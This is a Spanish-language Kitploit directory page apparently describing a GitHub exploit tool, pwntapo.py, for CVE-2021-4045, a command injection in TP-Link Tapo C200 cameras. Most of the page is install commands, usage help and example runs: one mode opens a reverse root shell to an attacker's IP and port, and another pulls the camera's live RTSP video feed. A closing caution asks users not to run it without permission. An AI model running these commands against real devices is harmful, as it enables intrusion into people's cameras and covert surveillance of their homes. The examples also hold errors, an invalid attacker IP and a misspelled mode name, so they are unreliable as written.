Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-4045 — 🔐 "PWNTAPO: Descubriendo la inyección de comandos en las cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓 | Kitploit
Herramientas/GitHubGitHub/0xbinder/cve-2021-4045
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónComando y ControlSeguridad de Hardware e IoTHerramienta de Acceso Remoto
GitHub0xbinder/cve-2021-4045

CVE-2021-4045

🔐 "PWNTAPO: Descubriendo la inyección de comandos en las cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓

Ver Repositorio
92hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

TP-Link Tapo c200 1.1.15 - Ejecución Remota de Código (RCE) (CVE-2021-4045)

🔐 "PWNTAPO: Revelando Inyección de Comandos en Cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓

Lee sobre el exploit en exploit db

Se trata de una vulnerabilidad de inyección de comandos que afecta a todas las versiones de firmware de la cámara TP-Link Tapo c200 anteriores a 1.1.16 Build 211209 Rel. 37726N. Para leer más sobre cómo funciona el exploit, consulta este artículo de hacefresko

Instalación

root@kitploit:~
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h

Uso

root@kitploit:~
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Revelando Inyección de Comandos en Cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)

options:
  -h, --help  muestra este mensaje de ayuda y sale
  -M M        modo de ataque : shell | rtsp (por defecto: None)
  -U U        RTSP_USER (por defecto: None)
  -P P        RTSP_PASSWORD (por defecto: None)
  -C C        RTSP_CIPHERTEXT (por defecto: None)
  -H H        dirección IP de la víctima (por defecto: None)
  -A A        dirección IP del atacante (por defecto: None)
  -p P        puerto de escucha (por defecto: None)
  -v          aumenta la verbosidad de salida (por defecto: False)

El exploit tiene dos modos: SHELL y RSTP.

SHELL

En el modo shell solo necesitas proporcionar la IP de la víctima, la IP del atacante y el puerto de escucha, y esto generará un shell root en el dispositivo.

root@kitploit:~
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Escuchando en el puerto 1887...
[+] Enviando shell reversa a 192.168.110.121...

Listening on 0.0.0.0 1887

RSTP

En el modo RSTP necesitarás proporcionar RSTP_USER, PASSWORD y CIPHERTEXT para poder obtener transmisión en vivo de la cámara.

root@kitploit:~
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Configurando transmisión de video RTSP...

PRECAUCIÓN: NO EJECUTES LA HERRAMIENTA EN DISPOSITIVOS SIN PERMISO DEL USUARIO

Descargar herramienta